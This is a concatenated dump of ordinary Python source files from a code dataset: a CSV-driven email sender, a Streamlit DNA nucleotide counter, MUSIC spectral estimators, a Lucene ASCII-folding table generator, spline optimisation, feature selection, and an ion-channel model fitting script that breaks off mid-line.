'NO_SENT':\n timepoint = datetime.today().strftime(\"%d.%m.%Y %H:%M\")\n logger.debug(\"Sending email on line %s\", i)\n elif mode.strip() == \"TEST\":\n recepients = [config.get(\"test_recepient\", \"\")]\n timepoint = datetime.today().strftime(\"%d.%m.%Y %H:%M\")\n logger.debug(\"Sending email on line %s\", i) \n else:\n should_send = False\n logger.info(\"Ignoring line %s, mode = %s\", i, mode)\n writer.writerow([raw_code, mode, timepoint, price, raw_recepients, company_name, file1, file2, file_code])\n continue \n\n try:\n if should_send:\n send_mail(smtp_server,\n send_from=send_from, send_to=recepients, \n subject=subject, text=body, files=files)\n except Exception as e:\n logger.error(\"Error on line %s\", i)\n logger.exception(e)\n \n writer.writerow([raw_code, \"ERROR\", timepoint, price, raw_recepients, company_name, file1, file2, file_code])\n continue\n \n logger.info(\"Sent message on line %s\", i)\n writer.writerow([raw_code, \"SENT\", timepoint, price, raw_recepients, company_name, file1, file2, file_code])\n\n return \"tmp_\" + basename(csvfile.name)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", type=argparse.FileType('r', encoding=\"cp1251\"), \n help=\"Config file path.\")\n parser.add_argument(\"--csv\", type=argparse.FileType('r', encoding=\"cp1251\"), \n help=\"Input CSV file path\")\n args = parser.parse_args()\n\n try:\n config = read_configuration(args.config)\n with smtplib.SMTP_SSL(config.get(\"host\", \"\"), config.get(\"port\", 0)) as smtp_server: \n smtp_server.login(config.get(\"login\", \"\"), config.get(\"password\", \"\"))\n tmp_filename = process_csv(smtp_server, args.csv, config)\n csv_filename = args.csv.name\n args.csv.close()\n os.replace(src=tmp_filename, dst=csv_filename)\n except Exception as e:\n logger.exception(e)\n\nmain()\n","sub_path":"docsender.py","file_name":"docsender.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"86846277","text":"import altair as alt\nimport pandas as pd\nfrom PIL import Image\n\nimport streamlit as st\n\nimage = Image.open('dna-logo.jpeg')\n\nst.image(image, use_column_width=True)\n\nst.write(\"\"\"\n# DNA Nucleotide Count Web App\n\nThis app Conts the nucleotide composition of query DNA!\n\n***\n\"\"\")\n\nst.header('Enter DNA sequence')\n\nsequence_input = \">DNA Query 2\\nGAACACGTGGAGGCAAACAGGAAGGTGAAGAAGAACTTATCCTATCAGGACGGAAGGTCCTGTGCTCGGG\\nATCTTCCAGACGTCGCGACTCTAAATTGCCCCCTCTGAGGTCAAGGAACACAAGATGGTTTTGGAAATGC\\nTGAACCCGATACATTATAACATCACCAGCATCGTGCCTGAAGCCATGCCTGCTGCCACCATGCCAGTCCT\"\n\nsequence = st.text_area(\"Sequence input\", sequence_input, height=250)\nsequence = sequence.splitlines()\nsequence\nsequence = sequence[1:]\nsequence\nsequence = ''.join(sequence)\n\nst.write(\"\"\"\n***\n\"\"\")\n\nst.header('INPUT (DNA QUERY)')\nsequence\n\nst.header('OUTPUT (DNA Nubleotide Count)')\n\nst.subheader('1. Print dictionary')\n\n\ndef DNA_nucleotide_count(seq):\n d = dict([\n ('A', seq.count('A')),\n ('T', seq.count('T')),\n ('G', seq.count('G')),\n ('C', seq.count('C')),\n ])\n return d\n\n\nX = DNA_nucleotide_count(sequence)\n\nX_label = list(X)\nX_values = list(X.values())\n\nX\n\nst.subheader('2. Print Text')\nst.write('There are ' + str(X['A']) + ' adenine (A)')\nst.write('There are ' + str(X['T']) + ' thymine (T)')\nst.write('There are ' + str(X['G']) + ' adenine (G)')\nst.write('There are ' + str(X['C']) + ' thymine (A)')\n\nst.subheader('3. Display DataFram')\ndf = pd.DataFrame.from_dict(X, orient='index')\ndf = df.rename({0: 'count'}, axis='columns')\ndf.reset_index(inplace=True)\ndf = df.rename(columns={'index': 'nucleotide'})\nst.write(df)\n\nst.subheader('4. Display Bar chart')\np = alt.Chart(df).mark_bar().encode(x='nucleotide', y='count')\np = p.properties(width=alt.Step(180))\nst.write(p)\n","sub_path":"demo/dna-app.py","file_name":"dna-app.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"120065502","text":"import numpy as np\nfrom scipy.linalg import toeplitz\n\n\n\n\"\"\" MUSIC (MUltiple SIgnal Classification) toolbox.\n \n Author: Raphaël Latty\n Semester Project - Guessing the fingerings\n EPFL - LCAV - Spring 2017 \"\"\"\n\n\n\ndef regular_music(x, p, M, precision_autocorr, NFFT):\n \n \"\"\" Implements the regular MUSIC (MUltiple SIgnal Classification) algorithm by constructing \n a frequency estimation function (estimate of the power spectrum).\n \n (inspired by Statistical Digital Signal Processing and Modeling, Monson H. Hayes, Chapter 8) \n \n input:\n - x: the signal to estimate the spectrum from, one-dimensional array\n - p: the presumed maximum number of sinusoids\n - M: the size of the autocorrelation matrix to use\n - precision_autocorr: the number of samples to use to \n compute the sample autocorrelation (by default, use the length of x)\n - NFFT: the number of fft bins/points\n \n output:\n - estimated_spectrum: the estimated pseudo-spectrum, one-dimensional array\n \n \"\"\"\n \n # compute the sample autocorrelation\n mid_point = int(np.floor(precision_autocorr/2))\n samp_autocorr = (1/mid_point) * np.correlate(x[0:precision_autocorr], \\\n x[0:precision_autocorr], 'same')[mid_point:]\n \n # construct the sample autocorrelation matrix\n # (Toeplitz structure from the properties of autocorrelation)\n Rx = toeplitz(samp_autocorr[0:M], np.conjugate(samp_autocorr[0:M]))\n \n # compute the eigenpairs (eigenvalues, eigenvectors)\n [eig_val, eig_vec] = np.linalg.eigh(Rx)\n \n # sort the eigenvalues in increasing order\n sorted_indices = np.argsort(eig_val)\n \n # initialize the estimated spectrum\n estimated_spectrum = 0\n \n # We consider the (M - p) smallest eigenpairs to form the freq. estimation function\n for j in range(M - p):\n \n # construct the estimate step by step\n estimated_spectrum += np.abs(np.fft.fft(eig_vec[:, sorted_indices[j]], NFFT))\n \n # invert the spectrum, square and convert to log scale (dB)\n estimated_spectrum = - (20 * np.log10(estimated_spectrum))\n \n return estimated_spectrum\n\n\n\ndef root_music(x, fs_recording, p, M, precision_autocorr):\n \n \"\"\" Implements the root-MUSIC algorithm by finding the roots of a suitable polynomial\n that are closest to the unit circle.\n \n (inspired by https://github.com/vincentchoqueuse/spectral_analysis_project/)\n \n input:\n - x: the signal to estimate the spectral components from, one-dimensional array\n - fs_recording: the sampling frequency of our recording\n - p: the assumed number of harmonics/spectral components\n - M: the size of the autocorrelation matrix to use\n - precision_autocorr: the number of samples to use to \n compute the sample autocorrelation (by default use the length of x)\n \n output:\n - estimated_frequencies: the estimated frequency components, one-dimensional array\n \n \"\"\"\n \n # compute the sample autocorrelation\n mid_point = int(np.floor(precision_autocorr/2))\n samp_autocorr = (1/mid_point) * np.correlate(x[0:precision_autocorr], \\\n x[0:precision_autocorr], 'same')[mid_point:]\n \n # construct the sample autocorrelation matrix\n Rx = toeplitz(samp_autocorr[0:M], np.conjugate(samp_autocorr[0:M]))\n \n # compute the eigenpairs (eigenvalues, eigenvectors)\n [eig_val, eig_vec] = np.linalg.eigh(Rx)\n \n # sort the eigenvalues in increasing order\n sorted_indices = np.argsort(eig_val)\n \n # We consider the noise eigenvectors, corresponding to the\n # smallest (M - p) eigenvalues\n V = eig_vec[:, sorted_indices[0:M - p]]\n D = V @ V.conj().T\n \n # construct the polynomial\n Q = 0j * np.zeros(2*M - 1)\n \n # extract the sum in each diagonal\n for (idx, val) in enumerate(range(M - 1, -M, -1)):\n diag = np.diag(D, val)\n Q[idx] = np.sum(diag)\n \n # compute the roots of our polynomial\n roots = np.roots(Q)\n \n # keep the roots with radius < 1 and with non-zero imaginary part\n roots = np.extract(np.abs(roots) < 1, roots)\n roots = np.extract(np.imag(roots) != 0, roots)\n \n # find the p roots closest to the unit circle\n distance_from_circle = np.abs(np.abs(roots) - 1)\n index_sort = np.argsort(distance_from_circle)\n component_roots = roots[index_sort[:p]]\n \n # extract the frequencies (in Hz)\n estimated_angles = np.angle(component_roots)\n estimated_frequencies = fs_recording * estimated_angles/(2*np.pi)\n \n return estimated_frequencies\n\n","sub_path":"python_code/MUSIC.py","file_name":"MUSIC.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"516814257","text":"#!/usr/bin/env python3\nimport re\nimport sys\nimport requests\nfrom bsdconv import Bsdconv\n\nif len(sys.argv) != 2:\n print(\"Usage: {} outfile\".format(sys.argv[0]))\n sys.exit(1)\n\noutfile = sys.argv[1]\n\ncv = Bsdconv(\"utf-8:split:bsdconv-keyword,bsdconv\")\n\ndef bc(s):\n return cv.conv(s).decode(\"utf-8\").strip(\",\")\n\nurl = \"https://raw.githubusercontent.com/apache/lucene-solr/master/lucene/analysis/common/src/java/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilter.java\"\njava = requests.get(url).text\ntks = re.findall(r\"(?:case '(.*?)':|output\\[outputPos\\+\\+\\] = '(.*?)';|(break);)\", java)\n\nm = {}\nf = []\nt = \"\"\nfor tk in tks:\n if tk[2]==\"break\":\n m[t.encode(\"utf-8\").decode(\"unicode_escape\")] = f\n f = []\n t = \"\"\n elif tk[1]:\n t = t + tk[1]\n elif tk[0]:\n f.append(tk[0].encode(\"utf-8\").decode(\"unicode_escape\"))\n else:\n print(\"Unexpected Error\")\n\nl = []\nfor f in m:\n t = m[f]\n for c in t:\n print(\"{}\\t{}\".format(c, f))\n l.append((bc(c), bc(f)))\n\nl.sort(key=lambda x: (len(x[0]), x[0]))\n\nwith open(outfile, \"w\") as out:\n out.write(\"# Derived from {}\\n\".format(url))\n for f, t in l:\n out.write(\"{}\\t{}\\n\".format(f, t))\n","sub_path":"tools/gen_asciifold.py","file_name":"gen_asciifold.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"527143726","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 21 16:12:16 2018\n\n@author: Tamo\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom util import *\ng = 9.81\n\nclass Polynome_partie:\n\n def __init__(self, points, d0, w):\n \"\"\"points est un tableau 1D, contenant uniquement des ordonnées egalement espacés de w. d0 est la dérivée à l'origine.\"\"\"\n self.points = points\n self.d0 = d0\n self.w = w\n self.regression()\n self.lon = len(self.points) - 1\n \n \n def a2(self, y0, y1, y2, d):\n return (8*y1 - y2 -7*y0 - 6*d*self.w)/(4*self.w**2)\n def a3(self, y0, y1, y2, d):\n return (-4*y1 + y2 + 3*y0 + 2*d*self.w)/(4*self.w**3)\n \n def b1(self, y0, y1, y2):\n return (4*y1 - y2 -3*y0)/(2*self.w)\n def b2(self, y0, y1, y2):\n return (-2*y1 + y2 + y0)/(2*self.w**2)\n \n def regression(self):\n \"\"\"génére les coef à partir de la liste de points et de la dérivée initiale\"\"\"\n c0, c1, c2, c3 = self.points[0], self.d0, self.a2(self.points[0], self.points[1], self.points[2], self.d0), self.a3(self.points[0], self.points[1], self.points[2], self.d0)\n self.coef = [[c0, c1, c2, c3]]\n for i in range(2, len(self.points)-2, 2):\n# d = c1 + 4*c2*self.w + 12*c3*self.w**2\n# d = 0\n# c0, c1, c2, c3 = self.points[i], d, self.a2(self.points[i], self.points[i+1], self.points[i+2], d), self.a3(self.points[i], self.points[i+1], self.points[i+2], d)\n# self.coef.append([c0, c1, c2, c3])\n c0, c1, c2 = self.points[i], self.b1(self.points[i], self.points[i+1], self.points[i+2]), self.b2(self.points[i], self.points[i+1], self.points[i+2])\n self.coef.append([c0, c1, c2])\n \n def partRegression(self, partie):\n \"\"\"réalise la regression à partir d'une partie seulement (il est nécéssaire en revanche de faire tous les coefficient suivants, \n qui peuvent se retrouver changés à cause des dérivées succesives)\"\"\"\n \n# if partie <= 0:\n# self.regression()\n# return None\n# else:\n# [c0, c1, c2, c3] = self.coef[partie - 1]\n# for i in range(partie * 2, self.lon-2, 2):\n# d = c1 + 4*c2*self.w + 12*c3*self.w**2\n# c0, c1, c2, c3 = self.points[i], d, self.a2(self.points[i], self.points[i+1], self.points[i+2], d), self.a3(self.points[i], self.points[i+1], self.points[i+2], d)\n# self.coef[i//2] = [c0, c1, c2, c3]\n self.regression()\n \n\n def f(self, x):\n \"\"\"la fonction multi polynomiale. k et offset permettent de modifier un valeur pour le calcul des dérivées de manière efficace\"\"\"\n assert 0 <= x <= self.w*self.lon\n partie = int(x/(2*self.w))\n var = 1\n x -= 2*partie*self.w\n ret = self.coef[partie][0]\n for i in range(1, len(self.coef[partie])):\n var *= x\n ret += self.coef[partie][i] * var\n return ret\n\n def d(self):\n \"\"\"dérivée\"\"\"\n dcoef = []\n for i in range(self.len):\n dp = []\n for j in range(1, self.deg):\n dp.append(j*self.coef[i, j])\n dcoef.append(dp)\n return Polynome_partie(np.array(dcoef), self.h)\n \n def backup(self):\n self.coef_backup = self.coef\n\n def rewind(self):\n self.coef = self.coef_backup\n \n\ndef v(y, v0 = 0):\n v2 = 2*g*y + v0**2\n if v2 < 0:\n return 1e-3\n if v2 == 0: return 1e-3\n else: return np.sqrt(v2)\n\ndef temps(Pp, v0, precision = 200):\n xmax = Pp.lon * Pp.w\n X = np.linspace(0, xmax-Pp.w, precision, False) #les intervalles de X. On inclut pas la dernière valur : il y a n-1 intervalles entre n points\n t = 0\n h2 = Pp.w**2\n for i in X:\n y1 = Pp.f(i)\n y2 = Pp.f(i+Pp.w)\n t += np.sqrt((y1 - y2)**2 + h2)/v((y1 + y2)/2)\n return t\n\ndef offset(Pp, v0, k, dy, precision):\n \"\"\"décale un point du polynome; retourne le temps; ne comprend aucun backup, IN_PLACE\"\"\"\n Pp.points[k] += dy\n Pp.partRegression((k-1)//2)\n Pp.points[k] -= dy\n return temps(Pp, v0, precision)\n\n\ndef minimum(Pp, v0, k, l = 0.2, dy = 5e-4, precision = 50):\n \"\"\"Calcul du minimum de temps dichotomique sur un intervalle autour de la valeur d'un coefficient\n Pp : polynome par partie\n k : valeur où trouver le minimum\n l : largeur de l'intervalle de recherche\n dy : largeur de la dérivée\"\"\"\n f = lambda x: offset(Pp, v0, k, x, precision) #fonction que à une valeur x associe le temps décallé d'autant\n a = -l\n b = l\n while b-a > 1e-3:\n m = (a+b)/2\n if f(m+dy) > f(m-dy):\n b = m\n else:\n a = m\n return (a+b)/2\n\n\ndef plotPol(Pp):\n xmax = Pp.lon * Pp.w\n X = np.linspace(0, xmax, 200, False) #les intervalles de X. On inclut pas la dernière valur : il y a n-1 intervalles entre n points\n Y = []\n X2 = np.linspace(0, xmax, Pp.lon + 1)\n for i in X:\n Y.append(Pp.f(i))\n plt.plot(X, Y, \"g.\")\n plt.plot(X2, Pp.points, \"b.\")\n plt.show()\n\ndef opti(H, W, v0, etapes, points, d0 = 0, h = 5e-4, precision = 50):\n X = np.linspace(0, W, points, True)\n Y = []\n for i in range(points-1):\n Y.append(0)\n Y.append(H)\n Pp = Polynome_partie(Y, d0, W/(points - 1))\n for i in range(etapes):\n D = []\n for k in range(1, points-1):\n Y[k] += minimum(Pp, v0, k, 0.2, h, precision)\n# D.append(minimum(Pp, v0, k, 0.05, h, precision))\n# for k in range(1, points-1):\n# Y[k] += D[k-1]\n plt.clf()\n plotPol(Pp)\n plt.show()\n plt.pause(0.05)\n Xc, Yc = plotCycl(H, W)\n plotPol(Pp)\n plt.plot(Xc, -Yc, color = \"green\")\n plt.show()\n return X, Y","sub_path":"Spline.py","file_name":"Spline.py","file_ext":"py","file_size_in_byte":5844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"192549561","text":"class Solution(object):\n def canVisitAllRooms(self, rooms):\n \"\"\"\n :type rooms: List[List[int]]\n :rtype: bool\n \"\"\"\n dic = dict()\n l = len(rooms)\n for i, room in enumerate(rooms):\n dic[i] = room\n visited = set()\n\n def DFS(i):\n if i in visited: return\n\n visited.add(i)\n for room in dic[i]:\n DFS(room)\n\n DFS(0)\n return True if len(visited) == l else False\n","sub_path":"Week_03/keys_and_room.py","file_name":"keys_and_room.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"446094979","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.svm import SVR\nfrom sklearn.feature_selection import RFECV\nfrom sklearn.cross_validation import StratifiedKFold\nfrom sklearn import preprocessing\n\nimport processing\n\nn = 4\n\n'''Unpickle pickled data.'''\ndata_sane = pd.read_pickle('data_offensive_sane.p')\n\nstats = ['Mins', 'Goals', 'Assists', 'SpG',\n 'KeyP', 'Drb', 'Fouled', 'Off',\n 'Disp', 'UnsTch', 'Starts', 'Subs', 'Age']\nylabels = ['Minutes played', 'Goals scored', 'Assists', 'Shots',\n 'Key passes', 'Dribbles', 'Fouled', 'Offsides',\n 'Dispossessed', 'Bad control', 'Starts', 'Subs', 'Age']\n\n'''Restructure dataset for analysis.'''\nprint('Restructuring DataFrame for analysis.')\ndata_ml = processing.create_attacking_player_dict(data_sane, n, stats)\nx = [point[0:-1] for point in data_ml.values]\ny = [value for value in data_ml.Y]\n\n'''Apply feature selection with cross-validation for SV regression'''\nprint('Now applying feature selection with cross-validation.')\nclf = SVR(kernel='linear', C=1e3, gamma=0.1)\nrfecv = RFECV(estimator=clf, step=1,\n cv=StratifiedKFold(y, 3), scoring='accuracy')\nrfecv.fit(preprocessing.scale(x), y) # SV data must be scaled to zero mean, unit variance!\n\n\nprint('Optimal number of features: %d' % rfecv.n_features_)\nfeatures = data_ml.columns\nprint([features[i] for i in range(len(rfecv.support_))\n if rfecv.support_[i] == True])\nplt.figure()\nplt.xlabel('Number of features selected')\nplt.ylabel('Cross validation score (nb of correct classifications)')\nplt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_)\nplt.show()\n\n\nprint('done!')\n","sub_path":"OldFiles/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"141121769","text":"\n#\n# This is the class which keeps all the data about integration,\n# computing statistics, etc\n#\n\n\nimport numpy as np\nimport math\nimport time as walltime\nimport pickle\nimport ast\n#import sys\n\nclass PData:\n \"All Integrator Data for the Program\"\n\n # -----------------------------------\n # pdict = dictionary\n def __init__(self):\n \"Init Class for Parameters\"\n self.pdict = dict()\n \n\n # -----------------------------------\n # d = another dictionary\n def update_from_dict(self, d):\n \"Update Parameter dict from another Dict\"\n self.pdict.update(d)\n\n # -----------------------------------\n # filename = string\n def update_from_file(self, filename):\n \"Update Parameter dict from file\"\n dd = dict()\n with open(filename,'r') as tmpfile:\n for line in tmpfile:\n (key, val) = line.split()\n dd[key] = ast.literal_eval(val)\n \n self.pdict.update(dd)\n\n # -----------------------------------\n def init_params(self):\n \"Init Parameters\"\n self.dim = self.pdict['dim']\n self.dim21 = int(self.dim/2 + 1)\n self.L = self.pdict['L']\n self.dx = self.L / (self.dim - 1)\n self.dt = self.pdict['dt']\n self.A = self.pdict['A']\n self.vis = self.pdict['vis']\n self.seed = self.pdict['seed']\n self.averwindow = self.pdict['averwindow']\n self.n = self.pdict['n']\n \n \n self.dtdx = self.dt/self.dx\n self.dxdt2 = self.dx/(2*self.dt)\n self.dtdx2 = self.dt/(2*self.dx)\n self.x0 = (2*np.sqrt(2)-1)**2\n self.dxl = (self.dx*self.averwindow)/self.L #change in shallow water also\n self.tpi=2*np.pi\n self.Adt=self.A/np.sqrt(self.dt)\n \n self.Tend = self.pdict['Tend']\n\n self.TstartOut = self.pdict['TstartOut']\n self.TstopOut = self.pdict['TstopOut']\n self.dtout = self.pdict['dtout']\n\n self.Tskip = self.pdict['Tskip']\n self.dtsubs = self.pdict['dtsubs']\n\n self.time = 0.0\n self.timeout = 0.0\n self.dt05 = 0.5*self.dt\n \n self.cflen = self.pdict['cflen']\n self.cflag = self.pdict['cflag']\n self.cfdim = self.pdict['cfdim']\n \n self.pdflen = self.pdict['pdflen']\n self.pdfstep = self.pdict['pdfstep']\n self.pdfmean = self.pdict['pdfmean']\n self.pdfdim = self.pdict['pdfdim']\n\n\n # messaging\n self.dtmes = self.pdict['dtmes']\n self.mes_into_file = self.pdict['MesFile']\n self.timemes = 0.0\n \n \n # compute how many steps between various things -\n \n # skipping, sub-sampling, etc.\n self.nums_subs = int(self.dtsubs/self.dt)\n self.nums = int((self.Tend - self.Tskip)/self.dtsubs)\n self.nums_skip = int(self.Tskip/self.dt)\n\n self.dimslow = int(self.dim /self.averwindow)\n self.dimslow21 = int(self.dimslow/2 + 1)\n \n self.n2dx=self.averwindow*2.0*self.dx\n self.ndx2=self.averwindow*((self.dx)**2)\n self.dtndx=self.dt/(self.dx*self.averwindow)\n \n self.cfdimslow = int(self.cfdim/self.averwindow)\n \n self.vdx2=self.vis/(self.dx**2)\n self.dx6=self.dx*6.0\n self.vndx2=self.vis/((self.dx*self.averwindow)**2)\n self.vndx22=self.vis/(self.averwindow*(self.dx**2))\n self.ndx6=self.dx*6.0*self.averwindow\n \n \n # -------------------------------\n # I also want to compute the time-interval since last message\n # and estimate the running time of the program.\n self.clockprev = walltime.clock()\n self.enerprev = 0.0\n\n self.clockstart = 0.0\n\n # -------------------------------\n # file to output time-series of energy\n self.enerfile = open('ener.dat','w')\n\n # -----------------------------------\n def compute_energy(self, u):\n \"Compute energy in Solution\"\n\n ener = 0.0\n for i in range(int(self.dim-1)):\n ener += u[i]**2\n return ener/self.dim*self.L\n \n # -----------------------------------\n def PrintMesProgress(self, u, dt):\n \"Print Message about Progress\"\n \"assume this function is called outside of the sub-samplig loop\"\n \" thus, we advance time by dt * nums_subs\"\n self.timemes += dt\n\n if (self.timemes >= self.dtmes - self.dt05):\n self.timemes = 0.0 \n if self.mes_into_file:\n\n clockcurrent = walltime.clock()\n ener = self.compute_energy(u)\n\n # write energy into file\n self.enerfile.write(str(self.time))\n self.enerfile.write(\" \")\n self.enerfile.write(str(ener))\n self.enerfile.write(\"\\n\")\n\n \n # write message\n tmpfile = open('mes.out','w')\n tmpfile.write(\"Computing at Time = \")\n tmpfile.write(str(self.time))\n tmpfile.write(\" \")\n tmpfile.write(\"Energy = \")\n tmpfile.write(str(ener))\n tmpfile.write(\"\\n\")\n \n tmpfile.write(\"Prev Energy = \")\n tmpfile.write(str(self.enerprev))\n tmpfile.write(\"\\n\")\n self.enerprev = ener\n\n tmp = clockcurrent - self.clockprev\n tmpfile.write(\"Wallcklock time since last mes = \")\n tmpfile.write(str(tmp))\n tmpfile.write(\" sec\\n\")\n self.clockprev = clockcurrent\n\n tmpfile.write(\"Wallclock Time Remaining\\n\")\n\n tmp = (clockcurrent - self.clockstart) * (self.Tend - self.time) / self.time\n days = int(tmp/60/60/24)\n hrs = int(tmp/60/60 - days*24)\n mnts = int(tmp/60 - hrs*60.0 - days*60.0*24.0)\n tmpfile.write(\"-- days = \")\n tmpfile.write(str(days))\n tmpfile.write(\", hrs = \")\n tmpfile.write(str(hrs))\n tmpfile.write(\", min = \")\n tmpfile.write(str(mnts))\n \n tmpfile.close()\n else:\n print(\"Computing at Time = \", self.time, \" Energy = \", self.compute_energy(u))\n\n # -----------------------------------\n def reset_timeout(self):\n \"Reset timout\"\n \n if self.output_condition():\n self.timeout = 0.0\n\n # -----------------------------------\n def advance_time(self):\n \" Advance All Time Vaiables after 1 time-step\"\n self.time += self.dt\n self.timeout += self.dt\n\n # -----------------------------------\n def output_condition(self):\n \"Return Condition to Output Soln into File\"\n cond1 = (self.TstartOut - self.dt05) <= self.time <= (self.TstopOut + self.dt05)\n cond2 = self.timeout >= self.dtout - self.dt05\n return (cond1 and cond2)","sub_path":"fbpdata.py","file_name":"fbpdata.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"292205379","text":"#!/usr/bin/env python2\nfrom __future__ import print_function\nimport sys\nsys.path.append('../lib/')\nimport os\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport pints\n\nimport model as m; m.vhold = 0\nfrom protocols import leak_staircase as protocol_def\n\n\"\"\"\nRun fit for single model cell experiment data\n\"\"\"\n\nsavedir = './out/'\nif not os.path.isdir(savedir):\n os.makedirs(savedir)\n\n# Load data\nimport util\nstaircase_idx = [0, 1, 0]\nf = 'data/20191011_mc3re_auto.dat'\nwhole_data, times = util.load(f, staircase_idx, vccc=True)\ntimes = times * 1e3 # s -> ms\ndata = (whole_data[0] + whole_data[3]) * 1e12 # A -> pA\n\n# Down sample...\ntimes = times[::5]\ndata = data[::5]\n\nprint('Fitting to ', f)\nsaveas = 'mc3simvc'\n\n# Control fitting seed --> OR DONT\n# fit_seed = np.random.randint(0, 2**30)\nfit_seed = 542811797\nprint('Fit seed: ', fit_seed)\nnp.random.seed(fit_seed)\n\n# Set parameter transformation\ndef transform_to_model_param(v):\n i = [0, 1, 2]\n o = np.copy(v)\n o[i] = np.exp(o[i])\n return o\n\ndef transform_from_model_param(v):\n i = [0, 1, 2]\n o = np.copy(v)\n o[i] = np.log(o[i])\n return o\n\n# Model\nmodel = m.Model('../mmt-model-files/simplified-voltage-clamp-mc3.mmt',\n protocol_def=protocol_def,\n temperature=273.15 + 23.0, # K\n transform=transform_to_model_param,\n readout='voltageclamp.Iin',\n useFilterCap=False)\nparameters = [\n 'mc.gk',\n 'mc.ck',\n 'mc.gm',\n 'voltageclamp.voffset_eff',\n]\nmodel.set_parameters(parameters)\nparameter_to_fix = [\n 'voltageclamp.cprs',\n 'voltageclamp.cm_est',\n 'voltageclamp.rseries',\n 'voltageclamp.rseries_est',\n]\nparameter_to_fix_values = [\n 4.7, # pF; Cprs\n 41.19, # pF; Cm* (assume it's the same as Cm)\n 33.6e-3, # GOhm; Rs (assume it's the same as Rs*)\n 33.6e-3 * 0.8, # GOhm; Rs* * alpha\n]\nfix_p = {}\nfor i, j in zip(parameter_to_fix, parameter_to_fix_values):\n fix_p[i] = j\nmodel.set_fix_parameters(fix_p)\n\n\n#\n# Fit\n#\n\n# Create Pints stuffs\nproblem = pints.SingleOutputProblem(model, times, data)\nerror = pints.RootMeanSquaredError(problem)\nlower = [\n 0.1, # pA/mV = 1/GOhm; g_kinetics\n 1., # pF; C_kinetics\n 0.1, # pA/mV = 1/GOhm; g_membrane\n -20., # mV; Voffset+\n]\nupper = [\n 100., # pA/mV = 1/GOhm; g_kinetics\n 1e5, # pF; C_kinetics\n 100., # pA/mV = 1/GOhm; g_membrane\n 20., # mV; Voffset+\n]\nboundaries = pints.RectangularBoundaries(transform_from_model_param(lower),\n transform_from_model_param(upper))\n\n# Check error is working fine\nidealparams = [\n 1. / 0.1, # pA/mV = 1/GOhm; g_kinetics\n 1000., # pF; C_kinetics\n 1. / 0.5, # pA/mV = 1/GOhm; g_membrane\n 0.0, # mV; Voffset+\n]# + [2.5] # pA; noise\npriorparams = [\n 1., # pA/mV = 1/GOhm; g_kinetics\n 10., # pF; C_kinetics\n 1., # pA/mV = 1/GOhm; g_membrane\n 0., # mV; Voffset+\n]# + [2.5] # pA; noise\ntransform_priorparams = transform_from_model_param(priorparams)\nprint('Score at prior parameters: ',\n error(transform_priorparams))\nprint(error(transform_from_model_param(idealparams)))\np = [\n 3.88407846048540421e+02,\n 1.44850672516807253e+03,\n 1.04988672817989661e-05,\n 2.04243756821879145e+01,\n]\nprint(error(transform_from_model_param(p)))\nfor _ in range(10):\n assert(error(transform_priorparams) ==\\\n error(transform_priorparams))\n\n# Run\ntry:\n N = int(sys.argv[1])\nexcept IndexError:\n N = 3\n\nparams, errors = [], []\n\nfor i in range(N):\n\n for _ in range(100):\n try:\n if i == 0:\n x0 = transform_priorparams\n else:\n # Randomly pick a starting point\n x0 = boundaries.sample()[0]\n error(x0)\n except ValueError:\n continue\n break\n print('Starting point: ', x0)\n\n # Create optimiser\n print('Starting error: ', error(x0))\n opt = pints.Optimisation(error, x0.T, boundaries=boundaries,\n method=pints.CMAES)\n opt.set_max_iterations(None)\n opt.set_max_unchanged_iterations(iterations=100, threshold=1e-5)\n opt.set_parallel(False)\n\n # Run optimisation\n try:\n with np.errstate(all='ignore'):\n # Tell numpy not to issue warnings\n p, s = opt.run()\n p = transform_to_model_param(p)\n params.append(p)\n errors.append(s)\n print('Found solution: Ideal parameters:' )\n for k, x in enumerate(p):\n print(pints.strfloat(x) + ' ' + \\\n pints.strfloat(idealparams[k]))\n except ValueError:\n import traceback\n traceback.print_exc()\n\n#\n# Done\n#\n\n# Order from best to worst\norder = np.argsort(errors) # (use [::-1] for LL)\nerrors = np.asarray(errors)[order]\nparams = np.asarray(params)[order]\n\n# Show results\nbestn = min(3, N)\nprint('Best %d errors:' % bestn)\nfor i in range(bestn):\n print(errors[i])\nprint('Mean & std of error:')\nprint(np.mean(errors))\nprint(np.std(errors))\nprint('Worst error:')\nprint(errors[-1])\n\n# Extract best 3\nobtained_error0 = errors[0]\nobtained_parameters0 = params[0]\nobtained_error1 = errors[1]\nobtained_parameters1 = params[1]\nobtained_error2 = errors[2]\nobtained_parameters2 = params[2]\n\n# Show results\nprint('Found solution: Ideal parameters:' )\n# Store output\nwith open('%s/%s-solution-%s-1.txt' % (savedir, saveas, fit_seed), 'w') as f:\n for k, x in enumerate(obtained_parameters0):\n print(pints.strfloat(x) + ' ' + pints.strfloat(idealparams[k]))\n f.write(pints.strfloat(x) + '\\n')\nprint('Found solution: Ideal parameters:' )\n# Store output\nwith open('%s/%s-solution-%s-2.txt' % (savedir, saveas, fit_seed), 'w') as f:\n for k, 